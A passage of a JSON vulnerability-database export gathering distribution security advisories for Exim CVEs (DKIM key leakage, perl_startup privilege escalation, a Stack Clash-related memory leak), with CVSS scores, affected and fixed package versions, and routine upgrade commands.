"baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2017-09-08T01:29:00", "id": "PRION:CVE-2016-1531", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-1531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-12-06T15:41:11", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM\nsigning key via vectors related to log files and bounce messages.\n\n#### Bugs\n\n * <https://bugs.exim.org/show_bug.cgi?id=1996>\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", 
"attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-16T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9963", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-16T00:00:00", "id": "UB:CVE-2016-9963", "href": "https://ubuntu.com/security/CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-07T15:22:30", "description": "Exim supports the use of multiple \"-p\" command line arguments which are\nmalloc()'ed and never free()'ed, used in conjunction with other issues\nallows attackers to cause arbitrary code execution. This affects exim\nversion 4.89 and earlier. 
Please note that at this time upstream has\nreleased a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it\nis not known if a new point release is available that addresses this issue\nat this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2017-1000369", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T00:00:00", "id": "UB:CVE-2017-1000369", "href": "https://ubuntu.com/security/CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-07T15:46:39", "description": "Exim before 4.86.2, when installed setuid root, allows local users to gain\nprivileges via the perl_startup argument.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | patches introduce a behaviour change that may break existing setups; must also ship two follow-up patches: 1- Don't issue env warning if env is empty 2- Store the initial working directory\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-02T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1531", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-02T00:00:00", "id": "UB:CVE-2016-1531", "href": "https://ubuntu.com/security/CVE-2016-1531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-12-06T18:21:53", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM signing key via vectors related to log files and bounce messages.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-01T15:59:00", "type": "debiancve", "title": "CVE-2016-9963", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-02-01T15:59:00", "id": "DEBIANCVE:CVE-2016-9963", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T22:23:31", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T16:29:00", "type": "debiancve", "title": "CVE-2017-1000369", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T16:29:00", "id": "DEBIANCVE:CVE-2017-1000369", "href": "https://security-tracker.debian.org/tracker/CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-06T22:23:31", "description": "Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T23:59:00", "type": "debiancve", "title": "CVE-2016-1531", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-04-07T23:59:00", "id": "DEBIANCVE:CVE-2016-1531", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2023-12-06T17:57:18", "description": "**Issue Overview:**\n\nIt was found that Exim leaked DKIM signing private keys to the \"mainlog\" log file. 
As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 exim-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mon-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mysql-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-pgsql-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.88-2.11.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-greylist-4.88-2.11.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 exim-4.88-2.11.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 exim-pgsql-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mon-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mysql-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-4.88-2.11.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-greylist-4.88-2.11.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2016-9963](<https://access.redhat.com/security/cve/CVE-2016-9963>)\n\nMitre: [CVE-2016-9963](<https://vulners.com/cve/CVE-2016-9963>)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-03-06T14:00:00", "type": "amazon", "title": "Medium: exim", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-03-06T14:00:00", "id": "ALAS-2017-804", "href": "https://alas.aws.amazon.com/ALAS-2017-804.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "ubuntu": [{"lastseen": "2023-12-06T16:17:28", "description": "## Releases\n\n * Ubuntu 16.10 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nBjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain \nconfigurations, private DKIM signing keys could be leaked to the log files.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-01-05T00:00:00", "type": "ubuntu", "title": "Exim vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-01-05T00:00:00", "id": "USN-3164-1", "href": "https://ubuntu.com/security/notices/USN-3164-1", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, 
{"lastseen": "2023-12-06T16:07:43", "description": "## Releases\n\n * Ubuntu 17.04 \n * Ubuntu 16.10 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nIt was discovered that Exim did not properly deallocate memory when \nprocessing certain command line arguments. A local attacker could use this \nin conjunction with a vulnerability in the underlying kernel to possibly \nexecute arbitrary code and gain administrative privileges.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T00:00:00", "type": "ubuntu", "title": "Exim vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T00:00:00", "id": "USN-3322-1", "href": "https://ubuntu.com/security/notices/USN-3322-1", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-07T15:10:33", "description": "## Releases\n\n * Ubuntu 15.10 \n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nIt was discovered that Exim incorrectly filtered environment variables when \nused with the perl_startup 
configuration option. If the perl_startup option \nwas enabled, a local attacker could use this issue to escalate their \nprivileges to the root user. This issue has been fixed by having Exim clean \nthe complete execution environment by default on startup, including any \nsubprocesses such as transports that call other programs. This change in \nbehaviour may break existing installations and can be adjusted by using two \nnew configuration options, keep_environment and add_environment. \n(CVE-2016-1531)\n\nPatrick William discovered that Exim incorrectly expanded mathematical \ncomparisons twice. A local attacker could possibly use this issue to \nperform arbitrary file operations as the Exim user. This issue only \naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-2972)\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-15T00:00:00", "type": "ubuntu", "title": "Exim vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2972", "CVE-2016-1531"], "modified": "2016-03-15T00:00:00", "id": "USN-2933-1", "href": "https://ubuntu.com/security/notices/USN-2933-1", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], 
"osv": [{"lastseen": "2022-08-05T05:17:56", "description": "\nExim supports the use of multiple \"-p\" command line arguments which are\nmalloc()'ed and never free()'ed, used in conjunction with other issues allows\nattackers to cause arbitrary code execution.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n4.80-7+deb7u5.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2017-06-25T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2022-08-05T05:17:53", "id": "OSV:DLA-1001-1", "href": "https://osv.dev/vulnerability/DLA-1001-1", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T07:06:59", "description": "\nThe Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. 
This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling. For the\nfull details, please refer to their advisory published at:\n<https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt>\n\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\n\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2017-06-19T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2022-08-10T07:06:36", "id": "OSV:DSA-3888-1", "href": "https://osv.dev/vulnerability/DSA-3888-1", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T06:49:51", "description": "\nA local root privilege escalation vulnerability was found in Exim,\nDebian's default mail transfer agent, in configurations using 
the\nperl\\_startup option (Only Exim via exim4-daemon-heavy enables Perl\nsupport).\n\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep\\_environment,\nadd\\_environment) were introduced to adjust this behavior.\n\n\nMore information can be found in the upstream advisory at\n[\\\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt](https://www.exim.org/static/doc/CVE-2016-1531.txt)\n\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 4.80-7+deb7u2.\n\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-14T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2023-06-28T06:49:39", "id": "OSV:DSA-3517-1", "href": "https://osv.dev/vulnerability/DSA-3517-1", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-12-06T15:52:22", "description": "### Background\n\nExim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. \n\n### Description\n\nExim supports the use of multiple \u201c-p\u201d command line arguments causing a memory leak. This could lead to a stack-clash in user-space and as result the attacker can, \u201cclash\u201d or \u201csmash\u201d the stack or another memory region, or \u201cjump\u201d over the stack guard-page. \n\n### Impact\n\nA local attacker could obtain root privileges.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.89-r1\"", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-09-24T00:00:00", "type": "gentoo", "title": "Exim: Local privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-09-24T00:00:00", "id": "GLSA-201709-19", "href": "https://security.gentoo.org/glsa/201709-19", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. It is freely available under the terms of the GNU General Public Licence. In style it is similar to Smail 3, but its facilities are more general. There is a great deal of flexibility in the way mail can be routed, and there are extensive facilities for checking incoming mail. Exim can be installed in place of sendmail, although the configuration of exim is quite different to that of sendmail. ", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2017-08-31T15:03:35", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: exim-4.89-5.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-08-31T15:03:35", "id": 
"FEDORA:E514560A8F98", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NI3SG43RHDCSIG63F3GJFP2DWDBJS36Y/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. It is freely available under the terms of the GNU General Public Licence. In style it is similar to Smail 3, but its facilities are more general. There is a great deal of flexibility in the way mail can be routed, and there are extensive facilities for checking incoming mail. Exim can be installed in place of sendmail, although the configuration of exim is quite different to that of sendmail. ", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-13T09:53:45", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: exim-4.85.2-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": 